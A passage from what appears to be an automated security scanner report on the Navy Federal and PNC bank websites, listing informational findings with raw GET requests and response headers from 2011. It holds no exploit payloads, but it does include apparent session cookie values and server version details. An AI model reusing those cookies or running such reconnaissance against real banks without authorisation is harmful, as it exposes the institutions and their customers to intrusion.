Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.80. https://www.navyfederal.org/products-services/checking-savings/iras.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/checking-savings/iras.php

Request

GET /products-services/checking-savings/iras.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:43 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:43 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.81. https://www.navyfederal.org/products-services/checking-savings/money-market.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/checking-savings/money-market.php

Request

GET /products-services/checking-savings/money-market.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:43 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:43 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.82. https://www.navyfederal.org/products-services/checking-savings/savings-rates.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/checking-savings/savings-rates.php

Request

GET /products-services/checking-savings/savings-rates.php?selectedTab=4 HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 60414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.83. https://www.navyfederal.org/products-services/checking-savings/savings.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/checking-savings/savings.php

Request

GET /products-services/checking-savings/savings.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.84. https://www.navyfederal.org/products-services/investments-insurance/events.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/investments-insurance/events.php

Request

GET /products-services/investments-insurance/events.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:52 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 32993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.85. https://www.navyfederal.org/products-services/investments-insurance/insurance.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/investments-insurance/insurance.php

Request

GET /products-services/investments-insurance/insurance.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:50 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:50 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.86. https://www.navyfederal.org/products-services/investments-insurance/investments.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/investments-insurance/investments.php

Request

GET /products-services/investments-insurance/investments.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:50 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:50 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 32190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.87. https://www.navyfederal.org/products-services/investments-insurance/nffg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/investments-insurance/nffg.php

Request

GET /products-services/investments-insurance/nffg.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:50 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:50 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.88. https://www.navyfederal.org/products-services/investments-insurance/tax-center.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/investments-insurance/tax-center.php

Request

GET /products-services/investments-insurance/tax-center.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:52 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.89. https://www.navyfederal.org/products-services/investments-insurance/trust-services.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/investments-insurance/trust-services.php

Request

GET /products-services/investments-insurance/trust-services.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:51 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.90. https://www.navyfederal.org/products-services/loans/auto/auto-loans.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/loans/auto/auto-loans.php

Request

GET /products-services/loans/auto/auto-loans.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:40 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 55989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.91. https://www.navyfederal.org/products-services/loans/auto/auto-rates.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/loans/auto/auto-rates.php

Request

GET /products-services/loans/auto/auto-rates.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:40 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 49581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.92. https://www.navyfederal.org/products-services/loans/boat-bike-rv/boat-bike-rv-loans.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/loans/boat-bike-rv/boat-bike-rv-loans.php

Request

GET /products-services/loans/boat-bike-rv/boat-bike-rv-loans.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:40 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.93. https://www.navyfederal.org/products-services/loans/equity/equity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/loans/equity/equity.php

Request

GET /products-services/loans/equity/equity.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:39 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.94. https://www.navyfederal.org/products-services/loans/mortgage/mortgage-rates.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/loans/mortgage/mortgage-rates.php

Request

GET /products-services/loans/mortgage/mortgage-rates.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:39 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 70035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.95. https://www.navyfederal.org/products-services/loans/mortgage/mortgage.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/loans/mortgage/mortgage.php

Request

GET /products-services/loans/mortgage/mortgage.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:39 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.96. https://www.navyfederal.org/products-services/loans/other/more-loans.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/loans/other/more-loans.php

Request

GET /products-services/loans/other/more-loans.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.97. https://www.navyfederal.org/products-services/loans/realtyplus.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/loans/realtyplus.php

Request

GET /products-services/loans/realtyplus.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.98. https://www.navyfederal.org/products-services/switch-to-navy-federal.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/switch-to-navy-federal.php

Request

GET /products-services/switch-to-navy-federal.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:52 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 29160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.99. https://www.navyfederal.org/search.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /search.php

Request

GET /search.php?q= HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:20:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 26681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.100. https://www.navyfederal.org/site-map.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /site-map.php

Request

GET /site-map.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:56 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:56 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 50114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.101. https://www.navyfederal.org/usa-federal-credit-union-merger/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /usa-federal-credit-union-merger/index.php

Request

GET /usa-federal-credit-union-merger/index.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:56 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:56 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 8592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.102. https://www.navyfederal.org/vendors/vendorMain.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /vendors/vendorMain.php

Request

GET /vendors/vendorMain.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:55 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:55 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 26662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.103. https://www.navyfederal.org/visabuxx/visa-buxx.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /visabuxx/visa-buxx.php

Request

GET /visabuxx/visa-buxx.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:52 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 29641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.104. https://www.navyfederal.org/why-choose-navy-federal.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /why-choose-navy-federal.php

Request

GET /why-choose-navy-federal.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.105. https://www.pnc.com/MapQuest/mqlocator/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /MapQuest/mqlocator/index.html

Request

GET /MapQuest/mqlocator/index.html HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:15 GMT
Last-Modified: Fri, 14 Jan 2011 15:32:34 GMT
Content-Length: 518
Keep-Alive: timeout=60, max=295
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US

<html>
<head>
<meta http-equiv="refresh" content="0;url=index.jsp">
<!--
Need to keep this page longer than 512 bytes to prevent IE from using its
custom error messages.
012345678901234567890123
...[SNIP]...

23.106. https://www.pnc.com/searchpnc/servlets/SearchPNCServletOnePNC  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /searchpnc/servlets/SearchPNCServletOnePNC

Request

GET /searchpnc/servlets/SearchPNCServletOnePNC HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:16 GMT
Keep-Alive: timeout=60, max=274
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 4209

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Search PNC</title>
<meta http-equiv="content-type" content="text/html; cha
...[SNIP]...

23.107. https://www.pnc.com/webapp/sec/Forms.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/sec/Forms.do

Request

GET /webapp/sec/Forms.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:11 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC9zZWMvRm9ybXMuZG8.
Keep-Alive: timeout=60, max=273
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

23.108. https://www.pnc.com/webapp/sec/ProductsAndService.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/sec/ProductsAndService.do

Request

GET /webapp/sec/ProductsAndService.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
